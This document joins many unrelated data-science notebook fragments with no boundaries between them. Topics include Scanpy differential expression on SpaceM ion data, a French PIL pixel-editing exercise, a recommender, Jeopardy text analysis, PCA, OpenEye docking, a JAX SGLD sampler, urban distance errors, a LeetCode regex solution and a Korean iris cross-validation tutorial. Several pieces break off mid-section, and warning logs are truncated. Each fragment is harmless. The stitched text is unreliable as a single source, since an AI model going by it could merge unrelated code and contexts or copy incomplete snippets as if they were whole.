"normalized_dataset_filter_low_ions.h5ad" cond_col = "marked_cells"Open and view normalized datasetadata = sc.read(normalized_dataset_path)Do differential expression analysis Aim: find ions, which have different intensity in different clusters or groups of cells. There are tons of articles and tutorials about DE in RNAseq and scRNAseq, so I will only comment on the differences.- In RNAseq data is descrete (counts) while in SpaceM data is continuous (intensity). In addition, it is not possible to measure intensities between 0 and some threshold (around 100 - 200 in raw ion intensity units), which results in kind of "truncated" distributions with large proportion of zeros for low-intensity ions. For small metabolite negative mode datasets most of intracellular ions have very low intensity. All this means that before using some complicated method designed for scRNAseq it's worth checking if statistical assumptions of the test are at least partially met.- In Scanpy there are several methods for differential expression analysis. I think that since distributions are not normal in our case, the best option is using Wilcoxon test.- Scanpy calculates fold change as median of intensity distribution for one condition divided by the median of the other condition. For ions with a lot of zeros it can give strange result, so I found it more useful to calculate fold change and do statistical testing only between non-zero part of distributions. It was done also for scRNAseq, with arguable (as always with DE testing) results.- With Wilcoxon test any difference will be significant if we compare more than a thousand samples against another thousand, so all p-values will be super small and largely noninformative. Getting realistic p-values would require creating statistical test, which is based exactly on the distributions that we have. However, fold changes and p-values from Wilcoxon test are already sufficient to rank ions in some way.- In the end after trying different options I arrived at a conclusion that it more or less doesn't matter, how exactly you do DE testing. But once you got top markers, it's important to check the following: - Intensity distributions really differ between conditions with the normalization that was chosen (all intensity distribtuions were plotted in the previous step) and it's not because of some outliers or something weird about how median was calculated - Checking ion in Metaspace shows that it is really intracellular, without strange gradients or missing parts in the ion image. Diagnostics should show that all the expected isotopic peaks are present and if intensity of the ion is high enough, isotopologue's spatial distribution looks colocalized with the main peak. If there is inconsistency between expected and observed isotopic peaks, it means that annotation is not reliable and it's better to be careful about interpreting its biological meaning - Up or down regulation of the molecule corresponds to what is expected based on literature or bulk mass spec Scanpy Wilcoxon testsc.tl.rank_genes_groups(adata, cond_col, method='wilcoxon', key_added = "wilcoxon", gene_symbols="var_names") sc.pl.rank_genes_groups(adata, n_genes=25, sharey=False, key="wilcoxon", gene_symbols="var_names")/Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: overflow encountered in expm1 foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:418: RuntimeWarning: overflow encountered in expm1 self.expm1_func(mean_rest) + 1e-9 /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: invalid value encountered in true_divide foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:417: RuntimeWarning: overflow encountered in expm1 foldchanges = (self.expm1_func(mean_group) + 1e-9) / ( /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/scanpy/tools/_rank_genes_groups.py:418: RuntimeWarning: overflo[...]There are lots of different plots to [visualize results of DE](https://nbisweden.github.io/workshop-scRNAseq/labs/compiled/scanpy/scanpy_05_dge.html) Save differential expression tablediff_expr_df = sc.get.rank_genes_groups_df(adata, None, key="wilcoxon", gene_symbols="var_names") diff_expr_df = diff_expr_df.sort_values("pvals_adj", ascending=True) diff_expr_df.head() diff_expr_df.to_csv(plots_path / "diff_expr.csv", index=False)Volcano plotVolcano plots are typically used to visualize results of DE analysis. It is a plot of $log_2(fold change)$ vs $-log_{10}(pval)$, so the plot shows how many ions were found to significantly change their abundance. Machine epsilon is added to each p-value to avoid $log(0)$ errors. Normally genes with small fold change should also have high p-value, because to detect small effect one needs big sample size, and genes with large change have lower p-values, creating "volcano" shape. Then the plot can be used to decide, what thresholds for significance and fold changes to use to identify ions of interest. Especially in our case statistical tests show that everything is significant, so one has to choose much lower threshold for p-values, than standard 0.05. Another useful thing to look at is if there are any outliers in fold changes.volcano_plot(adata, "wilcoxon", plots_path, pval_thresh=0.05, foldch_thresh=2, gene_symbols="var_names")/Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:109: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy df_group["significant"] = df_group["pvals_adj"] < pval_thresh /Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:112: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead See the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy df_group["up"] = df_group["significant"] & (df_group["logfoldchanges"] > up_thresh) /Users/alberto-mac/EMBL_repos/outer-spacem/outer_spacem/pl/_diff_expr.py:113: SettingWithCopyWarning: A value is tryi[...]Plot ion intensity distribtuions per conditiondist_plots_path = plots_path / "intensity_distributions" dist_plots_path.mkdir(parents=True, exist_ok=True) plot_distributions(adata, cond_col, dist_plots_path, gene_symbols="var_names")/Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/fromnumeric.py:3440: RuntimeWarning: Mean of empty slice. return _methods._mean(a, axis=axis, dtype=dtype, /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/_methods.py:189: RuntimeWarning: invalid value encountered in true_divide ret = ret.dtype.type(ret / rcount) /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/matplotlib/axes/_base.py:2475: UserWarning: Warning: converting a masked element to nan. xys = np.asarray(xys) /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/fromnumeric.py:3440: RuntimeWarning: Mean of empty slice. return _methods._mean(a, axis=axis, dtype=dtype, /Users/alberto-mac/miniconda3/envs/outerSpacem/lib/python3.8/site-packages/numpy/core/_methods.py:189: RuntimeWarning: invalid value encountered in true_divide ret = ret.dtype.type(ret / rcount) /Users/alberto-mac/miniconda[...]CH4 TP : Retouche d'image - ELEVESmodule PIL, pixels, tuples--- 1 Découverte de PILCe TP de retouche d'image utilise le module PIL (*python Image Library*), et le module IPython.display(affichages dans le notebook):from PIL import Image # to load images from IPython.display import display # to display images im = Image.open('./Images/mona_lisa.jpg') display(im)Vous pouvez, dans ce TP choisir de travailler sur une autre image. Dans ce cas la télécharger dans le dossier ./Images. Veillez à conserver une taille raisonnable (moins de 500x500).# Informations sur le fichier en utilisant le print formaté. print(f'type:{im.format}, taille:{im.size}, mode:{im.mode}')Quel est le type de l'attribut size de l'image im ? _ _ _ _ _ _ _ _ _ _ _ _ _ ---Chaque pixel est caractérisé par :- sa position (un tuple (x,y) )- sa couleur (un tuple (r,g,b) )---Les deux méthodes de PIL les plus utiles pour le traitement des pixels sont :- **getpixel: tuple(x,y) -> tuple(r,g,b)**- **putpixel: tuple(x,y) x tuple(r,g,b) -> ?**Tester ces deux exemples :r,v,b=im.getpixel((100,250)) print("R : ",r,"V : ",v,"B : ",b) im.putpixel((100,100),(255,0,0))Que fait cette deuxième commande ? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _Pour tester les modifications, vous pouvez lancer à tout moment la commande**display(im)**--- Partie 2 : Retouche de pixelsLes retouches d'images proposées ici concernent les couleurs. Il s'agit de construire des fonctions qui s'appliqueront aux pixels et qui modifieront leur tuple (R,V,B) :- inversion des couleurs- conversion en niveaux de gris- filtres A chaque fois que vous avez créé une fonnction qui modifie votre pixel. Il faut l'appliquer à tous les pixels de votre image. Ceci est réalisé grâce à une double boucle :# ici l'odre est lexicographique for j in range(im.size[1]): for i in range(im.size[0]): #traitement sur le pixel en (i,j) im.putpixel((i,j),filtre_rouge(im.getpixel((i,j)))) display(im)2.1 : Inversion des couleurs : (*)Inverser des couleurs, c'est mettre des 0 à la place des 1 et réciproquement :**inverser: tuple -> tuple**def inverser(c): '''inversion des couleurs entree : tuple r,g,b sortie : tuple r,g,b'''2.2 Niveaux de grisUne image apparaît grise si r=g=b dans la composante r,g,bUn calcul donne le niveau de gris **Gris = 0.299 Rouge + 0.587 Vert + 0.114 Bleu**Cette formule rend compte de la manière dont l’œil humain perçoit les trois composantes, rouge, vert et bleu, de la lumière. Pour chacune d'elles, la somme des 3 coefficients vaut 1. On remarquera la forte inégalité entre ceux-ci : une lumière verte apparaît plus claire qu'une lumière rouge, et encore plus qu'une lumière bleue. **griser: tuple->tuple**def griser(c): '''griser une couleur entree : (r,g,b) sortie : (r,g,b) grisé '''2.3 Filtre rougeUn filtre qui ne laisse passer que les rouges**filtre_rouge: tuple->tuple**def filtre_rouge(c): '''filtre rouge entree : (r,g,b) sortie : (r,g,b) seuls les rouges spnt conserves'''2.4 Effet libre : A vous d'inventer des nouveaux effets --- 3. Une autre approche de l'accès aux pixelsRemarque : Pour accélerer le traitement d'images, on peut remplacer les fonctions getpixel et putpixel par un accès direct au tableau bidimentionnel des pixels :# PIL accesses images in Cartesian co-ordinates, so it is Image[columns, rows] # plus rapide que putpixel ou getpixel img = Image.new( 'RGB', (250,250), "black") # create a new black image pixels = img.load() # create the pixel map for j in range(img.size[1]): for i in range(img.size[0]): pixels[i,j] = (i, j, 100) # set the colour accordingly display(img)Load Train/Test UserItemSettrain_set = UserItemSet.load_cls_from_file('trainset', '../data') test_set = UserItemSet.load_cls_from_file('testset', '../data') svd_recommender = SVDRecommender(250).fit(train_set) svd_recommender.save_to_file('svd_recommender_test', '../data') svd_recommender = SVDRecommender.load_cls_from_file('svd_recommender_test', '../data') user2recommended_items = svd_recommender.predict(test_set, train_set, remove_users_not_in_train=True, max_score_to_filter=0.0) mapk_scores = [] for user, recommended_items in user2recommended_items.items(): mapk_scores.append(apk(test_set.user2items_inner[user], recommended_items, k=100)) np.mean(mapk_scores)Objective2from obj3 import * pg=Polygons(5,7) for k in pg: print(k)Polygon(5,7) Polygon(4,7)Winning JeopardyJeopardy is a popular TV show in the US where participants answer questions to win money. It's been running for a few decades, and is a major force in popular culture.import pandas as pd import numpy as np import csv jeopardy = pd.read_csv('jeopardy.csv') jeopardy.head() jeopardy.columns #Removing the spaces in the column name jeopardy.columns = ['Show Number', 'Air Date', 'Round', 'Category', 'Value', 'Question', 'Answer']Normalizing TextBefore we start doing analysis on the Jeopardy questions, we need to normalize all of the text columns (the Question and Answer columns). The idea is to ensure that we lowercase words and remove punctuation so (Don't and don't) aren't considered to be different words when you compare them.import re def normalize(string): string = string.lower() string = re.sub("[^A-Za-z0-9\s]", "", string) string = re.sub("\s+", " ", string) return string #Normalizing Question column jeopardy["clean_question"] = jeopardy['Question'].apply(normalize) #Normalizing Answer column jeopardy["clean_answer"] = jeopardy['Answer'].apply(normalize)Normalizing columnsNow that We've normalized the text columns, there are also some other columns to normalize.The Value column should also be numeric, to allow us to manipulate it more easily. We'll need to remove the dollar sign from the beginning of each value and convert the column from text to numeric.The Air Date column should also be a datetime, not a string, to enable us to work with it more easily.def normalize_values(string): string = re.sub("[^A-Za-z0-9\s]", "", string) try: string = int(string) except Exception: string = 0 return string #Normalizing the value columns jeopardy['clean_value'] = jeopardy['Value'].apply(normalize_values) jeopardy["Air Date"] = pd.to_datetime(jeopardy["Air Date"]) jeopardy.head()Answers in questionIn order to figure out whether to study past questions, study general knowledge, or not study it all, it would be helpful to figure out two things:- How often the answer is deducible from the question.- How often new questions are repeats of older questions.We can answer the second question by seeing how often complex words (> 6 characters) reoccur. we can answer the first question by seeing how many times words in the answer also occur in the question. We'll work on the first question now, and come back to the second.def count_matches(row): split_answer = row["clean_answer"].split() split_question = row["clean_question"].split() if "the" in split_answer: split_answer.remove("the") if len(split_answer) == 0: return 0 match_count = 0 for item in split_answer: if item in split_question: match_count += 1 return match_count / len(split_answer) jeopardy["answer_in_question"] = jeopardy.apply(count_matches, axis=1) jeopardy.head() jeopardy['answer_in_question'].mean()Recycled QuestionsOn average, the answer only makes up for about 6% of the question. This isn't a huge number, and means that we probably can't just hope that hearing a question will enable us to figure out the answer. We'll probably have to studyquestion_overlap = [] terms_used = set() jeopardy = jeopardy.sort_values("Air Date") for i, row in jeopardy.iterrows(): split_question = row["clean_question"].split(" ") split_question = [q for q in split_question if len(q) > 5] match_count = 0 for word in split_question: if word in terms_used: match_count += 1 for word in split_question: terms_used.add(word) if len(split_question) > 0: match_count /= len(split_question) question_overlap.append(match_count) jeopardy["question_overlap"] = question_overlap jeopardy["question_overlap"].mean()Low values vs High values questionsThere is about 70% overlap between terms in new questions and terms in old questions. This only looks at a small set of questions, and it doesn't look at phrases, it looks at single terms. This makes it relatively insignificant, but it does mean that it's worth looking more into the recycling of questions.def determine_value(row): value = 0 if row["clean_value"] > 800: value = 1 return value jeopardy["high_value"] = jeopardy.apply(determine_value, axis=1) def count_usage(term): low_count = 0 high_count = 0 for i, row in jeopardy.iterrows(): if term in row["clean_question"].split(" "): if row["high_value"] == 1: high_count += 1 else: low_count += 1 return high_count, low_count from random import choice terms_used_list = list(terms_used) comparison_terms = [choice(terms_used_list) for _ in range(10)] observed_expected = [] for term in comparison_terms: observed_expected.append(count_usage(term)) observed_expectedApplying Chi-Squared testNow that we have found the observed counts for a few terms, we can compute the expected counts and the chi-squared valuefrom scipy.stats import chisquare import numpy as np high_value_count = jeopardy[jeopardy["high_value"] == 1].shape[0] low_value_count = jeopardy[jeopardy["high_value"] == 0].shape[0] chi_squared = [] for obs in observed_expected: total = sum(obs) total_prop = total / jeopardy.shape[0] high_value_exp = total_prop * high_value_count low_value_exp = total_prop * low_value_count observed = np.array([obs[0], obs[1]]) expected = np.array([high_value_exp, low_value_exp]) chi_squared.append(chisquare(observed, expected)) chi_squaredDo the PCA part, reducing the dimensionalityF=PCA(5) # only the top 5 data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) train_vectors_reduced=F.fit_transform(data_train.vectors) test_vectors_reduced=F.transform(data_test.vectors) print("shape train vectors:",data_train.vectors.shape) print("shape train vectors reduced:",data_train_reduced.vectors.shape) timeit(reset=True) C.fit(data_train_reduced.vectors,data_train_reduced.targets) print("Training time: ",timeit()) print("On Training Set:",C.percent_correct(data_train_reduced.vectors,data_train_reduced.targets)) print("On Test Set:",C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) F.weights.shapeVisualizing the componentsF.plot()you can specify which ones to plotF.plot([2,3,4])if it is an image, then you can show the components as imagesF.imshow(shape=(8,8))Tuning the number of PCs specify how many PCs to try...PCs=[2,4,6,8,10,20,40] percent_correct=[] for n in PCs: F=PCA(n) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) percent_correct.append(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) plot(PCs,percent_correct,'-o') xlabel('Number of PCs') ylabel('Percent Correct on Test Data')this does exactly the same thing, but does every number from 1 to 40, skipping every 2 (1,3,5,7,....,39]PCs=arange(1,40,2) percent_correct=[] for n in PCs: F=PCA(n) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) percent_correct.append(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) plot(PCs,percent_correct,'-o') xlabel('Number of PCs') ylabel('Percent Correct on Test Data')Getting rid of some PCsF=PCA(10) data_train_reduced=F.fit_transform_data(data_train) data_test_reduced=F.transform_data(data_test) C=NaiveBayes() C.fit(data_train_reduced.vectors,data_train_reduced.targets) print(C.percent_correct(data_test_reduced.vectors,data_test_reduced.targets)) data_train_reduced_removed=extract_features(data_train_reduced,list(range(2,10))) data_test_reduced_removed=extract_features(data_test_reduced,list(range(2,10))) C=NaiveBayes() C.fit(data_train_reduced_removed.vectors,data_train_reduced_removed.targets) print(C.percent_correct(data_test_reduced_removed.vectors,data_test_reduced_removed.targets))81.7777777778Docking fragments to PHIP2 site 1This content is by and , originally writen/adapted for a course (and available on GitHub at https://github.com/MobleyLab/drug-computing/blob/master/uci-pharmsci/lectures/docking_scoring_pose/OEDocking.ipynb) with heavy influence from the OpenEye documentation. It was adapted by David Mobley to the present PHIP2 Stage 2 challenge, and also utilizes examples I prepared for SAMPL5. https://github.com/samplchallenges/SAMPL6/blob/master/host_guest/GenerateInputs.ipynb#Import our required openeye modules from openeye import oechem, oedocking, oeomega import os # Load protein as preparation for making a "receptor" for docking #protein_file = '../../../PHIPA_C2_Apo.pdb' protein_file = '5enh_protein.pdb' ligand_file = '5enh_ligand.pdb' protein = oechem.OEGraphMol() ligand = oechem.OEGraphMol() ifile = oechem.oemolistream(protein_file) oechem.OEReadMolecule(ifile, protein) ifile.close() ifile = oechem.oemolistream(ligand_file) oechem.OEReadMolecule(ifile, ligand) ifile.close() #ifile = 'PHIPA_C2_DU.oedu' #du = oechem.OEDesignUnit() #oechem.OEReadDesignUnit(ifile, du) #du.GetProtein(protein) # INPUT BINDING SITE LOCATION siteloc = oechem.OEFloatArray(3) siteloc[0] = -19.150 siteloc[1] = -12.842 siteloc[2] = 24.7000 # Receptor file name receptor_file = '5enh_prepped.oeb' #receptor_file = 'PHIP2_apo_prepped.oeb' receptor = oechem.OEGraphMol() # Prep receptor if not os.path.isfile(receptor_file): oedocking.OEMakeReceptor(receptor, protein, ligand) #oedocking.OEMakeReceptor(receptor, protein, siteloc[0], siteloc[1], siteloc[2]) oedocking.OEWriteReceptorFile(receptor, receptor_file) else: #Read in our receptor from disc if not oedocking.OEReadReceptorFile( receptor, receptor_file ): # raise an exception if the receptor file cannot be read raise Exception("Unable to read receptor from {0}".format( receptor_file )) #Set the docking method and other paramters # Note: Chemgauss4 is the scoring function for FRED dock_method = oedocking.OEDockMethod_Chemgauss4 dock_resolution = oedocking.OESearchResolution_Default sdtag = oedocking.OEDockMethodGetName( dock_method ) #Generate our OEDocking object dock = oedocking.OEDock( dock_method, dock_resolution) #Initialize the OEDocking by providing it the receptor if not dock.Initialize(receptor): # raise an exception if the receptor cannot be initialized raise Exception("Unable to initialize Docking with {0}".format(receptor_file))Now that we have initialized our OEDocking object with our receptor, let's write a function that will take in the following input parameters: - dock: OEDock object - sdtag: string representing the name of the docking method - numpose: int with the number of poses to generate for each ligand - mcmol: multicomformer moleculedef dock_molecule( dock: "OEDock", sdtag: str, num_poses: int, mcmol ) -> tuple: ''' Docks the multiconfomer molecule, with the given number of poses Returns a tuple of the docked molecule (dockedMol) and its score i.e. ( dockedMol, score ) ''' dockedMol = oechem.OEMol() #Dock the molecule into a given number of poses res = dock.DockMultiConformerMolecule(dockedMol, mcmol, num_poses) if res == oedocking.OEDockingReturnCode_Success: #Annotate the molecule with the score and SDTag that contains the docking method oedocking.OESetSDScore(dockedMol, dock, sdtag) dock.AnnotatePose(dockedMol) score = dock.ScoreLigand(dockedMol) oechem.OESetSDData(dockedMol, sdtag, "{}".format(score)) return dockedMol, score else: # raise an exception if the docking is not successful raise Exception("Unable to dock ligand {0} to receptor".format( dockedMol ))With the docking function written, we can then loop over our 3D molecules and dock them to the given receptor# Read input molecule SMILES ligand_file = '../../../Stage-2-input-data/site-1_fragment-hits.csv' file = open(ligand_file,'r') text = file.readlines() file.close() ligands = {} omega = oeomega.OEOmega() omega.SetMaxConfs(500) # Temporary hack for F501 and F179, see https://github.com/samplchallenges/SAMPL7/issues/77 omega.SetStrictStereo(False) for line in text: tmp = line.split(',') mol = oechem.OEMol() mol.SetTitle(tmp[0]) smi = tmp[1].strip() # Parse SMILES to OEMol, generate conformers oechem.OEParseSmiles(mol, smi) status = omega(mol) if not status: print(f"Error running omega on {tmp[0]}.") # Store smiles string, mol w conformers to dictionary as tuple ligands[tmp[0].strip()] = ( smi , mol) #Define how many docked poses to generate per molecule num_poses = 1 outdir = 'poses' if not os.path.isdir(outdir): os.mkdir(outdir) #Read in our 3D molecules for lig_code in ligands: #Call our docking function dockedMol, score = dock_molecule( dock, sdtag, num_poses, ligands[lig_code][1] ) print("{} {} score = {:.4f}".format(sdtag, dockedMol.GetTitle(), score)) # Write output; as per challenge instructions each fragment to separate file ofs = oechem.oemolostream(os.path.join(outdir, f'PHIP2-{lig_code}-1.sdf')) oechem.OEWriteMolecule(ofs, dockedMol) ofs.close() # Make protein files to go along with submisssion import shutil for lig_code in ligands: outname = os.path.join(outdir, f'PHIP2-{lig_code}-1.pdb') shutil.copy(protein_file, outname)Build a diffusion solverIn this series of notebooks we use logistic regression as the example. However the usage is exactly the same for other models.Here we go to the lowest level of abstraction in `SGMCMCJax`: the solver for the diffusion.# import model and create dataset from sgmcmcjax.models.logistic_regression import gen_data, loglikelihood, logprior key = random.PRNGKey(42) dim = 10 Ndata = 100000 theta_true, X, y_data = gen_data(key, dim, Ndata) data = (X, y_data)WARNING:absl:No GPU/TPU found, falling back to CPU. (Set TF_CPP_MIN_LOG_LEVEL=0 and rerun for more info.)Here we import the solver for the Langevin diffusion for SGLD. We also import the function that builds the gradient of the log-posterior.The usage of the diffusion function is very similar to JAX [optimizer's](https://jax.readthedocs.io/en/latest/jax.experimental.optimizers.html) module. Calling `sgld(1e-5)` return 3 functions:- `init_fn`: this takes in the initial parameter and returns a `state` object- `update`: this takes in the iteration number, random key, gradient, and state. It returns the updated state- `get_params`: this takes in a `state` object and returns the parameterNote that here we must calculate the gradient at each iteration ourselves. This is useful if the data doesn't fit in memory so must be regularly loaded into memory. It is also useful if we want to implement our own gradient estimator that isn't included in the package.In this example we simply use the entire dataset with a Langevin diffusion. As a result this sampler is the Unadjusted Langevin Algorithm.from sgmcmcjax.diffusions import sgld from sgmcmcjax.util import build_grad_log_post init_fn, update, get_params = sgld(1e-5) update = jit(update) grad_log_post = build_grad_log_post(loglikelihood, logprior, data) %%time Nsamples = 1000 state = init_fn(theta_true) samples = [] for i in tqdm(range(Nsamples)): key, subkey = random.split(key) mygrad = grad_log_post(get_params(state), *data) # use all the data. state = update(i, subkey, mygrad, state) samples.append(get_params(state)) samples = np.array(samples) plt.plot(samples[10:,1])**EDA**df.info() df.describe() df.columns df.isnull().sum()**Model fit & training**X = df.iloc[:, 1:2].values y = df.iloc[:, 2].values regressor = DecisionTreeRegressor() regressor.fit(X, y)**Prediction**y_pred = regressor.predict(np.reshape(np.array(11),(-1, 1))) #Predict class or regression value for X. y_pred**Saving Decision tree**dot_data = export_graphviz(regressor, filled=True, rounded=True) graph = graph_from_dot_data(dot_data) graph.write_png("regressor_position.png") import cv2 img = cv2.imread("regressor_position.png") plt.figure(figsize = (15, 15)) plt.imshow(img)Get the simulation-based distance errors by using Haversine distance instead of network distanceSome areas are very large to run the simulation, so this part focuses on the distance errors in the selected urban areas.%load_ext autoreload %autoreload 2 %matplotlib inline import os import subprocess import sys import yaml import pandas as pd from pprint import pprint import geopandas as gpd import json def get_repo_root(): """Get the root directory of the repo.""" dir_in_repo = os.path.dirname(os.path.abspath('__file__')) # os.getcwd() return subprocess.check_output('git rev-parse --show-toplevel'.split(), cwd=dir_in_repo, universal_newlines=True).rstrip() sys.path.append(get_repo_root()) ROOT_dir = get_repo_root() with open(ROOT_dir + '/lib/regions.yaml') as f: region_manager = yaml.load(f, Loader=yaml.FullLoader) def get_region_area(region=None): # The boundary to use when downloading drive networks utm_epsg = region_manager[region]['utm_epsg'] zone_id = region_manager[region]['zone_id'] zones_path = region_manager[region]['zones_path'] zones = gpd.read_file(ROOT_dir + zones_path) zones = zones.loc[zones[zone_id].notnull()] zones = zones.rename(columns={zone_id: "zone"}) zones.zone = zones.zone.astype(int) zones = zones.loc[zones.geometry.notnull()].to_crs(utm_epsg) boundary = zones.assign(a=1).dissolve(by='a') area = boundary['geometry'].area/ 10**6 return area.values[0]1. Find the regions for analysisrunid = 7 regions = [x for x in region_manager if os.path.exists(ROOT_dir + f'/dbs/{x}/visits/visits_{runid}_trips_dom_network.csv')] pprint(regions)['barcelona', 'madrid', 'surabaya', 'johannesburg', 'capetown', 'kualalumpur', 'cebu', 'guadalajara', 'stpertersburg', 'nairobi']2. Calculate the urban areas (km^2)region_area_dict = {x: get_region_area(region=x) for x in regions} pprint(region_area_dict) with open(ROOT_dir + '/results/region_area_urban.txt', 'a') as outfile: json.dump(region_area_dict, outfile) outfile.write('\n') pprint([float("%.1f"%region_area_dict[x]) for x in regions]) df_area = pd.DataFrame.from_dict(region_area_dict, columns=['area'], orient='index').sort_values('area') pprint(df_area.index) pprint([region_manager[x]['name'] for x in df_area.index])Index(['guadalajara', 'kualalumpur', 'surabaya', 'barcelona', 'madrid', 'nairobi', 'stpertersburg', 'johannesburg', 'capetown', 'cebu'], dtype='object') ['Guadalajara, Mexico', 'Kuala Lumpur, Malaysia', 'Surabaya, Indonesia', 'Barcelona, Spain', 'Madrid, Spain', 'Nairobi, Kenya', 'Saint Petersburg, Russia', 'Johannesburg, South Africa', 'Cape Town, South Africa', 'Cebu, Philippines']3. Merge distance files and savedef region_data_loader(region=None, runid=None): df = pd.read_csv(ROOT_dir + f'/dbs/{region}/visits/visits_{runid}_trips_dom_network.csv') df.loc[:, 'region'] = region df.loc[:, 'distance_network'] += 0.4 # Compensate walking distance in 5 min return df.loc[:, ['region', 'distance', 'distance_network']] list_df = [region_data_loader(region=x, runid=runid) for x in regions] df = pd.concat(list_df) df = df.loc[(df.distance > 0.1) & (df.distance_network >= df.distance), :] df.loc[:, 'diff'] = df.loc[:, 'distance_network'] / df.loc[:, 'distance'] df.head() df.groupby('region')['diff'].median() df.to_csv(ROOT_dir + '/dbs/distance_error_simulation.csv', index=False)Given an input string (s) and a pattern (p), implement regular expression matching with support for `'.'` and `'*'`. '.' Matches any single character. '*' Matches zero or more of the preceding element. The matching should cover the entire input string (not partial).Note:- s could be empty and contains only lowercase letters a-z.- p could be empty and contains only lowercase letters a-z, and characters like . or *.Example 1: Input: s = "aa" p = "a" Output: false Explanation: "a" does not match the entire string "aa". Example 2: Input: s = "aa" p = "a*" Output: true Explanation: '*' means zero or more of the precedeng element, 'a'. Therefore, by repeating 'a' once, it becomes "aa". Example 3: Input: s = "ab" p = ".*" Output: true Explanation: ".*" means "zero or more (*) of any character (.)". Example 4: Input: s = "aab" p = "c*a*b" Output: true Explanation: c can be repeated 0 times, a can be repeated 1 time. Therefore it matches "aab". Example 5: Input: s = "mississippi" p = "mis*is*p*." Output: false [【LeetCode】正则表达式匹配(动态规划)](https://www.cnblogs.com/mfrank/p/10472663.html)# recursion, very slow class Solution: def isMatch(self, s: str, p: str) -> bool: if not p: return not s first_try = bool(s) and p[0] in {s[0],'.'} if len(p) >= 2 and p[1] == '*': return self.isMatch(s,p[2:]) or first_try and self.isMatch(s[1:],p) else: return first_try and self.isMatch(s[1:],p[1:]) # test s = "ab" p = ".*" Solution().isMatch(s,p) # dp, bottom to up class Solution: def isMatch(self, s: str, p: str) -> bool: dp = [[False]*(len(p)+1) for _ in range(len(s)+1)] dp[-1][-1] = True for i in range(len(s),-1,-1): for j in range(len(p)-1,-1,-1): first_try = i < len(s) and p[j] in {s[i],'.'} if j+1 < len(p) and p[j+1] == '*': dp[i][j] = dp[i][j+2] or first_try and dp[i+1][j] else: dp[i][j] = first_try and dp[i+1][j+1] return dp[0][0] # test s = "ab" p = ".*" Solution().isMatch(s,p)붓꽃(Iris) 품종 데이터 예측하기 Table of Contents1  DataFrame2  Train/Test 데이터 나누어 학습하기3  데이터 학습 및 평가하기4  교차 검증 (Cross Validation)4.1  교차검증 종류4.2  Kfold4.3  StratifiedKFold4.4  LeaveOnOutimport numpy as np import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt from sklearn import * from sklearn.datasets import load_iris from sklearn.tree import DecisionTreeClassifier from sklearn.model_selection import train_test_split from sklearn.metrics import accuracy_scoreDataFrameiris = load_iris() iris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names) iris_df['label'] = iris.target iris_df iris_df.shapeTrain/Test 데이터 나누어 학습하기X_train, X_test , y_train, y_test = train_test_split(iris.data, iris.target, test_size = 0.3, random_state = 100)데이터 학습 및 평가하기dt_clf = DecisionTreeClassifier() # 분류기 정의 및 fit dt_clf.fit(X_train,y_train) # 학습 y_pred = dt_clf.predict(X_test) # 예측한 결과 저장 accuracy_score(y_test,y_pred) # dt_clf.score(X_test, y_test)랑 같은 거교차 검증 (Cross Validation) 교차검증 종류 1. K-fold Cross-validation - 데이터셋을 K개의 sub-set으로 분리하는 방법 - 분리된 K개의 sub-set중 하나만 제외한 K-1개의 sub-sets를 training set으로 이용하여 K개의 모델 추정 - 일반적으로 K=5, K=10 사용 (-> 논문참고) - K가 적어질수록 모델의 평가는 편중될 수 밖에 없음 - K가 높을수록 평가의 bias(편중된 정도)는 낮아지지만, 결과의 분산이 높을 수 있음2. LOOCV (Leave-one-out Cross-validation) - fold 하나에 샘플 하나만 들어있는 K겹 교차 검증 - K를 전체 숫자로 설정하여 각 관측치가 데이터 세트에서 제외될 수 있도록 함 - 데이터셋이 클 때는 시간이 매우 오래 걸리지만, 작은 데이터셋에서는 좋은 결과를 만들어 냄 - 장점 : Data set에서 낭비 Data 없음 - 단점 : 측정 및 평가 고비용 소요 3. Stratified K-fold Cross-validation - 정답값이 모든 fold에서 대략 동일하도록 선택됨 - 각 fold가 전체를 잘 대표할 수 있도록 데이터를 재배열하는 프로세스 Kfoldfrom sklearn.model_selection import KFold kfold = KFold(n_splits = 10) # 교차검증 방법 설정 from sklearn.model_selection import cross_val_score # cross_val_score(모델, X , y , 사용할 교차검증 방법) cross_val_score(dt_clf, iris.data, iris.target, cv=kfold)StratifiedKFoldfrom sklearn.model_selection import StratifiedKFold skfold 